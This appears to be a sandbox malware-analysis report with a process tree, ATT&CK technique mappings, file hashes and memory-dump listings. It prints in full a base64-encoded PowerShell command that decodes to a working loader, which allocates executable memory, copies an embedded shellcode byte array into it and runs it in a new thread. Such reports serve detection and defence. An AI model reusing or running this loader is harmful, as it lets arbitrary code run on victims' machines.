  - - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" -enc JAB0ADQAQQBXACAAPQAgACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnADsAJAB3ACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0AbQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQAdAA0AEEAVwAgAC0ATgBhAG0AZQAgACIAVwBpAG4AMwAyACIAIAAtAG4AYQBtAGUAcwBwAGEAYwBlACAAVwBpAG4AMwAyAEYAdQBuAGMAdABpAG8AbgBzACAALQBwAGEAcwBzAHQAaAByAHUAOwBbAEIAeQB0AGUAWwBdAF0AOwBbAEIAeQB0AGUAWwBdAF0AJAB6ACAAPQAgADAAeABkAGIALAAwAHgAYwA5ACwAMAB4AGQAOQAsADAAeAA3ADQALAAwAHgAMgA0ACwAMAB4AGYANAAsADAAeABiAGYALAAwAHgAOAA1ACwAMAB4ADgAOQAsADAAeABlADIALAAwAHgAYgA0ACwAMAB4ADUAYQAsADAAeAAyAGIALAAwAHgAYwA5ACwAMAB4AGIAMQAsADAAeAA0AGIALAAwAHgAMwAxACwAMAB4ADcAYQAsADAAeAAxADcALAAwAHgAMAAzACwAMAB4ADcAYQAsADAAeAAxADcALAAwAHgAOAAzACwAMAB4ADQANwAsADAAeAA4AGQALAAwAHgAMAAwACwAMAB4ADQAMQAsADAAeABiAGIALAAwAHgANgA2ACwAMAB4ADQAYgAsADAAeABhAGEALAAwAHgANAAzACwAMAB4ADcANwAsADAAeAAzADQALAAwAHgAOQBhACwAMAB4ADkAMQAsADAAeABmAGUALAAwAHgANQAxACwAMAB4AGIAOAAsADAAeAA5AGUALAAwAHgANQAzACwAMAB4AGEAYQAsADAAeABjAGEALAAwAHgAZgAyACwAMAB4ADUAZgAsADAAeAA0ADEALAAwAHgAOQBlACwAMAB4AGUANgAsADAAeABkADQALAAwAHgAMgA3ACwAMAB4ADMANwAsADAAeAAwADkALAAwAHgANQBjACwAMAB4ADgAZAAsADAAeAA2ADEALAAwAHgAMgA0ACwAMAB4ADUAZAAsADAAeAAyADMALAAwAHgAYQBlACwAMAB4AGUAYQAsADAAeAA5AGQALAAwAHgAMgA1ACwAMAB4ADUAMgAsADAAeABmADAALAAwAHgAZgAxACwAMAB4ADgANQAsADAAeAA2AGIALAAwAHgAMwBiACwAMAB4ADAANAAsADAAeABjADcALAAwAHgAYQBjACwAMAB4ADgAYQAsADAAeAA2ADIALAAwAHgAMgA4ACwAMAB4ADYAMAAsADAAeAA4ADcALAAwAHgAZABmACwAMAB4AGEANgAsADAAeABkADIALAAwAHgAMQBjACwAMAB4ADkAZAAsADAAeABmAGEALAAwAHgAZABkACwAMAB4AGYAMgAsADAAeABhADkALAAwAHgANAAzACwAMAB4AGEANgAsADAAeAA3ADcALAAwAHgANgBkACwAMAB4ADMANwAsADAAeAAxAGEALAAwAHgANwA2ACwAMAB4AGIAZQAsADAAeAAzADMALAAwAHgAZQBhACwAMAB4ADYAMAAsADAAeAA2AGUALAAwAHgAYwBmACwAMAB4AGIAMwAsADAAeABiADAALAAwAHgAOABmACwAMAB4ADEAYwAsADAAeABjADYALAAwAHgANwA5ACwAMAB4AGYAYgAsADAAeAA5AGUALAAwAHgAZgA4ACwAMAB4ADgANgAsADAAeAA0AGQALAAwAHgANQA0ACwAMAB4AGMAZQAsADAAeABmADMALAAwAHgANABmACwAMAB4AGIAYwAsADAAeAAxAGUALAAwAHgAYwAzACwAMAB4AGYAYwAsADAAeAA4ADEALAAwAHgAYQBlACwAMAB4AGMAZQAsADAAeABmAGQALAAwAHgAYwA2ACwAMAB4ADAAOQAsADAAeAAzADAALAAwAHgAOAA4ACwAMAB4ADMAYwAsADAAeAA2AGEALAAwAHgAYwBkACwAMAB4ADgAYgAsADAAeAA4ADYALAAwAHgAMQAwACwAMAB4ADAAOQAsADAAeAAxADkALAAwAHgAMQA5ACwAMAB4AGIAMgAsADAAeABkAGEALAAwAHgAYgA5ACwAMAB4AGYAZAAsADAAeAA0ADIALAAwAHgAMABmACwAMAB4ADUAZgAsADAAeAA3ADUALAAwAHgANAA4ACwAMAB4AGUANAAsADAAeAAyAGIALAAwAHgAZAAxACwAMAB4ADQAZAAsADAAeABmAGIALAAwAHgAZgA4ACwAMAB4ADYAOQAsADAAeAA2ADkALAAwAHgANwAwACwAMAB4AGYAZgAsADAAeABiAGQALAAwAHgAZgBiACwAMAB4AGMAMgAsADAAeAAyADQALAAwAHgAMQBhACwAMAB4AGEANwAsADAAeAA5ADEALAAwAHgANAA1ACwAMAB4ADMAYgAsADAAeAAwAGQALAAwAHgANwA0ACwAMAB4ADcAOQAsADAAeAA1AGIALAAwAHgAZQA5ACwAMAB4ADIAOQAsADAAeABkAGYALAAwAHgAMQA3ACwAMAB4ADEAOAAsADAAeAAzAGMALAAwAHgANQBmACwAMAB4AGQAOAAsADAAeABlADIALAAwAHgANAAxACwAMAB4ADMAZAAsADAAeAA0AGYALAAwAHgAMgBlACwAMAB4ADgAZgAsADAAeABiAGUALAAwAHgAOABmACwAMAB4ADMAOAAsADAAeAA5ADgALAAwAHgAYwBkACwAMAB4AGIAZAAsADAAeABlADcALAAwAHgAMwAyACwAMAB4ADUAYQAsADAAeAA4AGUALAAwAHgANgAwACwAMAB4ADkAYwAsADAAeAA5AGQALAAwAHgAOAA3ACwAMAB4ADYANwAsADAAeAAxAGYALAAwAHgANwAxACwAMAB4ADIAZgAsADAAeABlADcALAAwAHgAZABlACwAMAB4ADcAMgAsADAAeAA1ADAALAAwAHgAMgAxACwAMAB4ADIANAAsADAAeAAyADYALAAwAHgAMAAwACwAMAB4ADUAOQAsADAAeAA4AGQALAAwAHgANAA3ACwAMAB4AGMAYgAsADAAeAA5ADkALAAwAHgAMwAyACwAMAB4ADkAMgAsADAAeAA2ADYALAAwAHgAOQAwACwAMAB4AGEANAAsADAAeAAxADcALAAwAHgANwA3ACwAMAB4AGEANgAsADAAeAAzAGIALAAwAHgANAAwACwAMAB4ADcANQAsADAAeABhADYALAAwAHgANABiACwAMAB4ADMAZQAsADAAeABmADAALAAwAHgANAAwACwAMAB4ADEAYgAsADAAeAA2AGUALAAwAHgANQAzACwAMAB4AGQAZAAsADAAeABkAGIALAAwAHgAZABlACwAMAB4ADEAMwAsADAAeAA4AGQALAAwAHgAYgAzACwAMAB4ADMANAAsADAAeAA5AGMALAAwAHgAZgAyACwAMAB4AGEAMwAsADAAeAAzADYALAAwAHgANwA2ACwAMAB4ADkAYgAsADAAeAA0ADkALAAwAHgAZAA5ACwAMAB4ADIAZgAsADAAeABmADMALAAwAHgAZQA1ACwAMAB4ADQAMAAsADAAeAA2AGEALAAwAHgAOABmACwAMAB4ADkANAAsADAAeAA4AGQALAAwAHgAYQAwACwAMAB4AGYANQAsADAAeAA5ADYALAAwAHgAMAA2ACwAMAB4ADQANwAsADAAeAAwADkALAAwAHgANQA4ACwAMAB4AGUAZgAsADAAeAAyADIALAAwAHgAMQA5ACwAMAB4ADAAYwAsADAAeAAxAGYALAAwAHgANwA5ACwAMAB4ADQAMwAsADAAeAA5AGEALAAwAHgAMgAwACwAMAB4ADUANwAsADAAeABlAGUALAAwAHgAMgAyACwAMAB4AGIANQAsADAAeAA1AGMALAAwAHgAYgA5ACwAMAB4ADcANQAsADAAeAAyADEALAAwAHgANQBmACwAMAB4ADkAYwAsADAAeABiADEALAAwAHgAZQBlACwAMAB4AGEAMAAsADAAeABjAGIALAAwAHgAYwBhACwAMAB4ADIANwAsADAAeAAzADUALAAwAHgAYgA0ACwAMAB4AGEANAAsADAAeAA0ADcALAAwAHgAZAA5ACwAMAB4ADMANAAsADAAeAAzADQALAAwAHgAMQBlACwAMAB4AGIAMwAsADAAeAAzADQALAAwAHgANQBjACwAMAB4AGMANgAsADAAeABlADcALAAwAHgANgA2ACwAMAB4ADcAOQAsADAAeAAwADkALAAwAHgAMwAyACwAMAB4ADEAYgAsADAAeABkADIALAAwAHgAOQBjACwAMAB4AGIAZAAsADAAeAA0AGEALAAwAHgAOAA3ACwAMAB4ADMANwAsADAAeABkADYALAAwAHgANwAwACwAMAB4AGYAZQAsADAAeAA3ADAALAAwAHgANwA5ACwAMAB4ADgAYQAsADAAeABkADUALAAwAHgAOAAwACwAMAB4ADQANQAsADAAeAA1AGQALAAwAHgAMQAzACwAMAB4AGYANwAsADAAeABhADcALAAwAHgANQBkADsAJABnACAAPQAgADAAeAAxADAAMAAwADsAaQBmACAAKAAkAHoALgBMAGUAbgBnAHQAaAAgAC0AZwB0ACAAMAB4ADEAMAAwADAAKQB7ACQAZwAgAD0AIAAkAHoALgBMAGUAbgBnAHQAaAB9ADsAJABlAFUAMwA9ACQAdwA6ADoAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKAAwACwAMAB4ADEAMAAwADAALAAkAGcALAAwAHgANAAwACkAOwBmAG8AcgAgACgAJABpAD0AMAA7ACQAaQAgAC0AbABlACAAKAAkAHoALgBMAGUAbgBnAHQAaAAtADEAKQA7ACQAaQArACsAKQAgAHsAJAB3ADoAOgBtAGUAbQBzAGUAdAAoAFsASQBuAHQAUAB0AHIAXQAoACQAZQBVADMALgBUAG8ASQBuAHQAMwAyACgAKQArACQAaQApACwAIAAkAHoAWwAkAGkAXQAsACAAMQApAH0AOwAkAHcAOgA6AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgAMAAsADAALAAkAGUAVQAzACwAMAAsADAALAAwACkAOwBmAG8AcgAgACgAOwA7ACkAewBTAHQAYQByAHQALQBzAGwAZQBlAHAAIAA2ADAAfQA7AA==
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:4256
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gdqmy0wm\gdqmy0wm.cmdline"
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:5048
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB844.tmp" "c:\Users\Admin\AppData\Local\Temp\gdqmy0wm\CSC57FF2F284C7C47B3ACAD66D2EE9CAB7C.TMP"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2116

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RESB844.tmp

Filesize
1KB

MD5
20cbedb100bc746ba95d8c40f2f1a873

SHA1
46e7cc3dc1ab57ff22021534ee76bcb4703d509b

SHA256
65bae5c643e55b1debe17c8dfbc755225ab6a1be4596d39d33e586cdd3e6fcb6

SHA512
5215f05d4e8cc6e0e18e5fbe84fc553aede94edf78f54b9503578271d1fc29f8c69e8259ae68a6705d99cd6407952c11fe93ca6a6516058ae6703eb9b1aacf4c

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4mfvb1h0.sy2.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\gdqmy0wm\gdqmy0wm.dll

Filesize
3KB

MD5
bf660d139f1288466f0c9292d8f1cd77

SHA1
b794a6e9e067392df111f16fa574411cdda15e45

SHA256
ee389286c05ebe26edfc1ce0704f2e9891a01c9c4ef0184b1540a5cb327e91e5

SHA512
319c2eccc84aaeb2efbb8769ef1a22bf69bf77b02f3203fde46dd6b1e456c341c37b38eb25e8ec4f68e411e8e99c9dee08adb4fe9cd651fe0b5c631a31e60bf8

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\gdqmy0wm\CSC57FF2F284C7C47B3ACAD66D2EE9CAB7C.TMP

Filesize
652B

MD5
f2ebf44a4db9ede8b8ad039728e7960d

SHA1
87c8f01e4e4f5477506a3e86f1110d54a7e107d6

SHA256
80d65f40f5ddf45b0eef39328c1bbd7f1ad92cc1b69067ace152f6ded4ec54f4

SHA512
5e523e304188b096eacdf8e512f6e1eea7c0c1866b8160a388705d449c730df78e49d16f87d7a70a55a264d7244335b1bc380391114b848cbdb6d1af58433030

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\gdqmy0wm\gdqmy0wm.0.cs

Filesize
557B

MD5
7319070c34daa5f6f2ece2dfc07119ee

SHA1
f26a4a48518a5608e93c8b77368f588b0433973c

SHA256
b240a9bb4f72d886522e19fa40b9c688fa94c1bd6dc7b7185f94e4466273a5dc

SHA512
34169fc9fb0cd2381c45efcd22ec1bc659ef513e73bc4c7bcb91ca1d5129a1a149e9f75297acb4958e52ff04d75e6e121232dbc0657611e41b63f10aa3e1d6bd

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\gdqmy0wm\gdqmy0wm.cmdline

Filesize
369B

MD5
d8e0324a6a626e9c2d3c60a61404fc52

SHA1
bdf489bdb699b4f9adaef5a96479deffe270572a

SHA256
2d5fb5539394558a29b73ee4c84425d65834939fc6e8c50ec6cd8dfd2b2505f0

SHA512
ced5505f08e2090e7959de0ed4b519aa0b8f35ced26346d530dce6a3a28fca058fca81baec9facb93897a2e6a81802247470ca198e944e08e70cfb8e9c36093e

Download Submit
memory/400-14-0x00007FF8DCEC0000-0x00007FF8DD981000-memory.dmp

Filesize
10.8MB

Download
memory/400-53-0x00007FF8DCEC0000-0x00007FF8DD981000-memory.dmp

Filesize
10.8MB

Download
memory/400-13-0x00007FF8DCEC0000-0x00007FF8DD981000-memory.dmp

Filesize
10.8MB

Download
memory/400-12-0x00007FF8DCEC0000-0x00007FF8DD981000-memory.dmp

Filesize
10.8MB

Download
memory/400-2-0x0000028188A30000-0x0000028188A52000-memory.dmp

Filesize
136KB

Download
memory/2844-0-0x00007FF8DCEC3000-0x00007FF8DCEC5000-memory.dmp

Filesize
8KB

Download
memory/2844-52-0x00007FF8DCEC3000-0x00007FF8DCEC5000-memory.dmp

Filesize
8KB

Download
memory/2844-1-0x0000000000570000-0x000000000057A000-memory.dmp

Filesize
40KB

Download
memory/4256-15-0x0000000074DEE000-0x0000000074DEF000-memory.dmp

Filesize
4KB

Download
memory/4256-49-0x0000000006F10000-0x0000000006F18000-memory.dmp

Filesize
32KB

Download
memory/4256-33-0x0000000006950000-0x000000000696E000-memory.dmp

Filesize
120KB

Download
memory/4256-34-0x0000000006980000-0x00000000069CC000-memory.dmp

Filesize
304KB

Download
memory/4256-35-0x00000000081B0000-0x000000000882A000-memory.dmp

Filesize
6.5MB

Download
memory/4256-36-0x0000000006E80000-0x0000000006E9A000-memory.dmp

Filesize
104KB

Download
memory/4256-20-0x0000000005A90000-0x0000000005AB2000-memory.dmp

Filesize
136KB

Download
memory/4256-22-0x00000000062A0000-0x0000000006306000-memory.dmp

Filesize
408KB

Download
memory/4256-21-0x0000000005B30000-0x0000000005B96000-memory.dmp

Filesize
408KB

Download
memory/4256-32-0x0000000006310000-0x0000000006664000-memory.dmp

Filesize
3.3MB

Download
memory/4256-19-0x0000000074DE0000-0x0000000075590000-memory.dmp

Filesize
7.7MB

Download
memory/4256-17-0x0000000074DE0000-0x0000000075590000-memory.dmp

Filesize
7.7MB

Download
memory/4256-51-0x0000000007B30000-0x0000000007B31000-memory.dmp

Filesize
4KB

Download
memory/4256-18-0x0000000005C70000-0x0000000006298000-memory.dmp

Filesize
6.2MB

Download
memory/4256-16-0x0000000003360000-0x0000000003396000-memory.dmp

Filesize
216KB

Download
memory/4256-54-0x0000000074DEE000-0x0000000074DEF000-memory.dmp

Filesize
4KB

Download
memory/4256-55-0x0000000074DE0000-0x0000000075590000-memory.dmp

Filesize
7.7MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads